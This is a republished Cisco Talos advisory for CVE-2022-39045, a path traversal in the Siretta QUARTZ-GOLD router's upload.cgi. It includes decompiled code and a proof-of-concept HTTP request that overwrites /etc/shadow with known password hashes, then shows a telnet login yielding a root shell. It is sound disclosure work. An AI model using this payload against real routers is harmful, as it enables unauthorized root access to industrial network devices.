Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-39045: TALOS-2022-1611 || Cisco Talos Intelligence Group

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CVE
#vulnerability#web#cisco#intel#auth#ssh#telnet

SUMMARY

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

PRODUCT URLS

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

CVSSv3 SCORE

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

The endpoint upload.cgi permits to upload a file. Following one of the functions responsible for this API:

void input_upload.cgi(char *path,int len,char *boundary)

{
  [...]   
  remaining_length_to_write = len;
  storage_udisk = nvram_get_int("storage_udisk");
  [... calculate base_folder and perform basic checks...]
  else {
    [...]
    filename_param = (char *)webcgi_safeget("filename");                                                        [1]
    filename = "";
    if (filename_param != (char *)0x0) {
      filename = filename_param;
    }
    sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
    fd = fopen(buff,"w");                                                                                       [3]
    if (fd == (FILE *)0x0) {
      base_folder = "Unable to start pipe for mtd write";
    }
    else {
      [...]
      boundary_len = strlen(boundary);
      remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
      while (0 < (int)remaining_length_to_write) {
        n_bytes_to_read = remaining_length_to_write;
        [...]
        n_bytes_read = web_read(buff,n_bytes_to_read);
        [...]
        remaining_length_to_write = remaining_length_to_write - n_bytes_read;
        bytes_written = safe_fwrite(buff,1,n_bytes_read,fd);                                                    [4]
        [...]
}

This function will fetch the specified filename, at [1], and then it will use it to compose the file-path at [2]. The compose file-path is used at [3] to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at [4]. Because from [1] up to [2] no sanitization is performed against the filename parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.

Exploit Proof of Concept

Sending a request like the following:

POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic <a valid basic auth value>
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884

--906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name="content"; filename="content"

root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
--906881afb7fae201f7f9962a229f9884--

If the request was successful, it is now possible to access the device using root:admin as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:

❯ telnet 192.168.0.1 2323
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
QUARTZ-GOLD login: root
Password: 

root@QUARTZ-GOLD:/tmp/home/root#

Effectively allowing arbitrary command execution.

TIMELINE

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Related news

The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato

Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Cisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router. The Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907